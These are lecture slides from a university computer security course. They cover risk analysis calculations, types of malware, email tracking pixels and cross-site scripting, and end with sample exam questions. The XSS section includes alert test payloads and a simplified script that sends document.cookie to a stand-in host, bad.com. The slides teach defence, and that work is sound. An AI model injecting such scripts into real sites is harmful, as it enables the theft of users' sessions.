Computer SecuritySet of slides 8

Dr Alexei Vernitski

Risk analysis

• Quantitative risk analysis• Qualitative risk analysis

Read more in textbooks, for example, Pfleeger and Pfleeger, chapter “Administering Security”

Risk analysis

• Step 1: identify assets– There are many types of assets (data, hardware,

software, people, supplies, brand name, infrastructure ...)

• Step 2: Determine vulnerabilities– The list of security goals may be used to suggest

vulnerabilities: Confidentiality, Integrity, Availability

Risk analysis

• Step 3: Estimate likelihood of exploitation– Need to estimate the probability of exploitation of

vulnerability– Can use data on frequency of attacks on specific systems– Often an expert analyst can help with this

• Step 4: Compute the loss in case of an attack– Some are straightforward (e.g. cost of replacing piece of

standard hardware), some may be very difficult– If recovery is possible, include also the cost of recovery

Risk analysis

• Step 5: Select new controls– For each vulnerability a suitable control is selected– For example, see the matrix of vulnerabilities and

controls in Pfleeger and Pfleeger• Step 6: Determine project savings

Example

• The input parameters are as follows:• Asset and cost if lost:

– Data, cost to reconstruct if lost is £10 M• Likelihood of loss of data (exploit)

– Probability of it is 5% (from expert knowledge)• Control and cost: encrypted data store with replicated off-

site data storage using transaction based approach to guarantee backup of each datum change. – The cost of the solution is £1 M

• Effectiveness of control:– Probability that the control is effective is 70%

Example

• The calculation is as follows (annual data):• Expected loss without control: 0.05 × 10M = £0.5 M• Expected loss with control: £0.5 M×0.3 = £0.15 M• Cost of control and expected loss with control in

place:• £0.15 M + £1.0 M = £1.15 M• Finally the decision: the cost with the control

(£1.15 M) is larger than the cost without (£0.5 M)• so decide not to use control

Example – for discussion

• (Pfleeger and Pfleeger, Table 8-7)• Cost of reconstructing data, if lost: £1 M• Likelihood of the loss of the data (per year):

10%• Access control software is available which

costs £25 K and is effective in 60% of cases• Should we buy this software?

Example – for discussion

• An organisation has 100 employees. Each of them uses a laptop that costs £1000. In any one year there are likely to be two employees that loose their laptops and need an urgent replacement to carry out their work. The organisation decides to buy one spare laptop (cost £1000 per year). This replacement is likely to be available and useful in 80% of the cases of a loss (i.e. it may not have specialist software installed which an employee needs immediately, or the replacement laptop may be used by another employee).

• Carry out each of the steps of a quantitative risk analysis.• Carry out a cost/benefit analysis (if possible) and state if the

organisation should carry out the proposal.

• Most parameters are difficult of impossible to evaluate:– amount of loss for a given asset– some valuable items (e.g. a human life)– likelihood that a loss will occur– cost of control– effectiveness of control

• Why do we need risk analysis, even though the numbers it produces are unreliable?

Risk analysis

• Quantitative risk analysisuses costs and probabilities

• Qualitative risk analysisuses non-numerical grades, for example– Critical / very important / important / not important– Very likely / likely / unlikely / very unlikely

• Which type of analysis would you recommends, the quantitative or the qualitative one?

Other types of malware

• Viruses• Worms• Trojans• Rootkits• Trapdoors/backdoors

Trojans

• A trojan horse is a program that appears to have some useful or benign purpose, but really masks some hidden malicious functionality

• Example: http://www.softlate.com/

Trojans

• Unlike viruses, Trojan horses do not replicate themselves

• Unlike viruses, which are just bad tricks, Trojan horses usually attempt to do something useful for their creator

• The main use of Trojans is to collect information from your computer

• This is why they are called spyware

Example: W32/Sdbot-MA• Each time W32/Sdbot-MA is run it attempts to

connect to a remote IRC server and join a specific channel. The worm then runs in the background allowing a remote intruder to issue commands which control the computer.

• W32/Sdbot-MA can be instructed to download and install programs on the infected computer, to flood other computers with network packets and retrieve system information including CD-keys for various games.

(the information is taken from www.sophos.com)

Trojans’ behaviour

• Simple examples of typical behaviour of a Trojan include:

• Attempting to send e-mail messages to its creator

• Opening a TCP/IP port on your computer, to allow its creator to connect to your computer

How Trojans collect information

• Keystroke trackers (also known as keystroke recorders) – record what the user has typed

• Fake login screens – they emulate login to find out your password

How Trojans collect information

• Garbage trackers – they look in the RAM or on the disk for documents which might be encrypted when they are stored in files

• 85% of documents edited yesterday can be found in unused sectors of the hard drive

Protection against Trojans

• Before your computer is infected:– Do not download software from untrusted sources

• When your computer is infected:– Checking logs – Using sandboxes (what is a sandbox?)– Using firewalls (what is a firewall?)

Worms

• A worm is a self-replicating piece of code that spreads via networks and usually doesn’t require human interaction to propagate.

• Example: Melissa virus from the previous lecture could be also classified as a worm

Trapdoors/backdoors

• A backdoor is a is a secret entry point to a program that otherwise operates normally. It allows attackers to bypass normal security controls, gaining access on the attacker’s own terms.

• (this is the definition given with respect to one separate program)

Backdoors (relative to one program)

Here, a password is checked

And here,the actual code

starts

Here, a password is checked

And here,the actual code

starts

Normally, execution starts at the beginning of the program However, a

hacker can start the program at some distance

from the beginning, and

see what happens

Trapdoors/backdoors

• A backdoor is a is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.

• (this is the definition given with respect to the whole computer system)

Backdoors (relative to a computer)

First, check the user’s password

After that, allow the user to work with the data or

run programs

First, check the user’s password

After that, allow the user to work with the data or

run programs

The normal user’s work

session starts here a hacker can start

a work session bypassing

password check

Backdoors

• Remote execution of individual commands• Remote command-line access• Remote control of the GUI

Rootkit

• A rootkit is a set of tools that modify existing operating system software so that an attacker can keep access to and hide on the machine.

• We can say that rootkits install trojans and backdoors – why?

Code in e-mail messages

• These are simple techniques which an attacker can use; we consider them to prepare for considering more complicated techniques of cross-site scripting

• It is possible to include executable code (e.g. JavaScript, VBA) in e-mail messages

• This can be used to collect information about the receiver of the message

• In more dangerous cases, the code can affect the work of the receiver’s computer

Code in e-mail messages

• Example: spammers check the validity of e-mail addresses using HTML messages

• (this is referred to as ‘read tracking’, or also look up ‘pixel tracking’)

• <html><body><img src=“www.spam.com/script.php?id=3495"></body></html>

How spammers check the validity of e-mail addresses

• The idea is as follows. • The spammer generates a numbered list of e-mail

addresses, for example:1 aaa@essex.ac.uk2 bbb@essex.ac.uk…………3495 asvern@essex.ac.uk

• The spammer sends a message to each address, which includes the number of this address in the list as an argument of a script

Code in e-mail messages

• <img src=“www.spam.com/script.php?id=3495">

client server

The script script.php is executed on the server www.spam.com. This script can record that asvern checks his e-mail, therefore, it is a valid e-mail address

The client on which asvern checks his e-mail is lured into asking the server to execute script.php with an argument id=3495

For discussion

• Before December 2013 Google Mail did not show images in messages by default

• After December 2013, Google caches the images on its servers before showing them to the recipient

• What are the advantages and disadvantages of this change?

• Discussed, for example, here:https://threatpost.com/gmail-image-proxy-changes-have-privacy-security-implications/103192

Cross-site scripting (XSS)

• XSS comes in two broad forms, which have these confusing names:– non-permanent, or, reflective– permanent

• In both forms the attacker uses some means to send some code to a web server so that a victim accesses the page and runs the code thinking it comes from the “trusted” web-server rather than the attacker.

XSS: snippets of code

• Good examples of insecure pages:http://www.insecurelabs.org/task

• ‘Hello world’ in Javascript:<script>alert('hello world')</script>

• A query passed to the server and executed by the client:http://www.insecurelabs.org/task/Rule1?query= <script>alert('hello world')</script>

• Instead of this simple script, a code stealing cookies would be used by an attacker

XSS: a simplified example

• Suppose the attacker places the following comment on a message board:<SCRIPT type="text/javascript"> c = ‘bad.com/process.php?cookie=' + escape(document.cookie); </SCRIPT>

Sample exam questions

• Comment on the news item:“Deniss Calovskis was named by the US as one of the creators of the Gozi virus.Security analyst Graham Cluley said Gozi was a very successful trojan that pilfered huge sums from bank accounts.”

• Comment on the news item:“The suspected hackers allegedly placed back doors, or code, to allow them to get back into the systems later to steal confidential information.”

Sample exam questions

• Explain exactly what the word ‘cross-site’ stands for in cross-site scripting (XSS).

• Experts in computer security distinguish between permanent and non-permanent cross-site scripting. Explain exactly what the difference is between permanent and non-permanent cross-site scripting.